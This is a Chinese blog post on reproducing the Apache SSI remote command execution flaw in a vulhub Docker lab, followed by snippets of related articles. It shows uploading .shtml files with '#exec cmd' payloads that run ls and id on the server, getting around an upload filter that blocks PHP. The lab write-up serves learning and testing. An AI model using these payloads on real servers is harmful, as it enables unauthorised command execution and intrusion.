Apache SSI 远程命令执行漏洞复现

最新推荐文章于 2024-05-03 11:46:25 发布
最新推荐文章于 2024-05-03 11:46:25 发布
阅读量246 收藏 1
点赞数
分类专栏: 渗透测试 渗透实验 安全漏洞 文章标签: 安全 web安全 安全漏洞 渗透测试 Apache SSI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/125391188
版权

Apache SSI 远程命令执行漏洞复现

1. 漏洞简介

当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。

使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。

2.搭建环境

使用kali搭建vulhub,完成漏洞复现

cd vulhub-master/httpd/ssi-rcedocker-compose up -d

环境启动后,访问http://your-ip:8080/upload.php,就可看到一个上传表单页面。

3.漏洞复现

正常上传PHP文件时不允许的,我们可以上传一个.shtml文件,test.shtml文件,内容如下:

<!--#exec cmd="ls" -->

成功上传,然后访问test.shtml,完整网站为:http://192.168.116.131:8080/test.shtml

再试试其他命令,上传test2.shtml,然后访问test2.shtml

<!--#exec cmd="id" -->

成功

参考链接:

Vulhub - Docker-Compose file for vulnerability environment

声明:

本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,

作者创作不容易,请大家点赞收藏支持一下。谢谢各位读者大老爷。

HEAVM
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache默认是不支持SSI如何给Apache增加SSI支持
09-15
需要注意的是,由于SSI是基于文件系统的,它可能会带来安全风险,比如允许恶意用户通过SSI漏洞执行任意命令。因此,在启用SSI时,一定要确保你的网站目录权限设置得当,避免敏感信息泄露或被恶意利用。 总的来说,...
Apache SSI 远程命令执行漏洞
qq_29948489的博客
01-26 451
SSI(服务器端包含)是放置在 HTML 页面中的指令,并在提供页面时在服务器上进行评估。它们允许您将动态生成的内容添加到现有 HTML 页面,而无需通过 CGI 程序或其他动态技术提供整个页面。在测试任意文件上传漏洞的时候,目标服务端可能不允许上传 php 后缀的文件。如果目标服务器开启了 SSI 与 CGI 支持,我们可以上传一个 shtml 文件,并利用。创建反弹.sh 文件,给权限,再用/bin/bash 运行。(反弹 shell,拿到权限)配置服务器以允许 SSI。,即可看到一个上传表单。
中间件漏洞 | Apache-SSI/任意命令执行
weixin_52116519的博客
11-05 612
Apache SSI 远程命令执行漏洞在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用
Apache SSI远程命令执行漏洞
最新发布
weixin_74020633的博客
05-03 1067
Apache SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。从技术层面来讲,SSI是一种在静态的shtml文件中根据需求插入内容;SSI其实是一套为web服务器提供的命令,指令的基本格式为:<!--指令名称="指令内容"-->指令名称指令作用#include将文本文件的内容直接插入到文档页面中#echo将环境变量插入到页面中。
文件上传 - Apache SSI远程命令执行
Kevin's Blog
07-19 1276
文章目录一、漏洞原理二、漏洞场景/挖掘思路三、触发条件四、漏洞复现4.1 启动环境4.2 访问环境4.3 复现过程五、防御措施 一、漏洞原理   在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php / jsp / asp后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法执行任意命令。 Tips:(shtml释义) T1(作用?): 一些大的...
配置Apache支持shtml(SSI)的方法
09-15
这三行分别表示加载ssi_module模块,指定.shtml文件类型为HTML并启用包含过滤器,使得Apache在处理.shtml文件时执行SSI指令。 如果你希望全局开启SSI,即所有站点都支持,可以将上述配置添加到`httpd.conf`的适当...
apache SHTML网页SSI使用详解
01-11
方法一:下面是详细的设置apache支持shtml的设置步骤开启includes模块运行shtml 0、开启php环境安装目录 (我的为D:\wamp\Apache2\conf下) 的httpd.conf 文件中的(大概408-409行处): 1、 AddType text/...
Apache 支持CGI程序和SSI程序的设置方法
09-16
SSI则是一种服务器端脚本技术,它可以动态地插入文件、时间戳、执行命令或者根据用户请求生成内容。 要使Apache支持CGI和SSI,首先需要确保Apache在安装时包含了必要的模块。`mod_include`负责处理SSI,而`mod_...
Apache SSI 远程命令执行漏洞SSI注入漏洞复现 _ _使用vulhub搭建环境
net的博客
02-19 318
实验环境:Ubuntu。
Apache SSI远程命令执行漏洞复现
qq_42754807的博客
06-01 213
apache ssi远程命令执行漏洞复现
复现Apache SSI 远程命令执行漏洞
qq_62673514的博客
02-19 153
复现Apache SSI 远程命令执行漏洞
Apache SSI 远程命令执行Apache HTTPD 多后缀解析、Nginx 解析漏洞复现
m0_53042636的博客
04-12 4202
(1)、Apache SSI 远程命令执行漏洞复现。 环境搭建: 上传一个php文件,提示不支持的上传的类型。 上传一个shell.shtml文件,里面写入以下内容: 浏览器访问上传的文件,下图可以看到成功执行代码,说明存在远程命令执行漏洞。 原理:如果目标服务器开启了SSI与CGI支持;这样我们就可以上传一个可执行的shtml文件。 (2)、Apache HTTPD 多后缀解析漏洞复现 环境搭建 路径为:/vulhub/httpd/apache_parsing_vulnerability 运行:
安全中级3:apache中间件漏洞
weixin_62870380的博客
06-06 1550
运维人员在配置http的默认配置文件的时候,开启了AddHandler application/x-httpd-php .php,虽然限制住了php文件,但是我们可以添加后缀.jpg,只要我们的后缀含有一个php文件就可以解析,没必要是最后一个后缀。我们上传php文件的时候,我们的服务器拒绝上传,但是 apache在配置文件的http.conf的时候开启了SSI(服务器端包含)服务,允许我们的html页面上传shtml文件,而我们的cgi是前端的一个脚本,我们利用他的语法执行任意的命令
Apache SSI 远程命令执行漏洞 漏洞复现
鸥鹭忘机
09-30 740
前言&原理 如果目标服务器开启了ssi功能,那么shtml文件将可以执行任意命令。如果上传文件程序限制了php文件的上传,且没有限制shtml文件上传,我们可以上传一个shtml文件,并利用<!--#exec cmd="命令" -->语法执行任意命令ssi详细讲解请参考:https://blog.csdn.net/weixin_30399871/article/details/94779816,什么是SSIssi漏洞挖掘思路请参考:https://blog.csdn.net/q
Apache SSI教程:实战与配置详解
安装后,用户可以根据官方文档自定义配置,但教程主要关注如何在Apache的配置文件(如`httpd.conf`)中添加必要的指令来支持SSI,如添加`AddType`、`Options`和`AddOutputFilter`等,以便处理`.ssi`类型的HTML文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值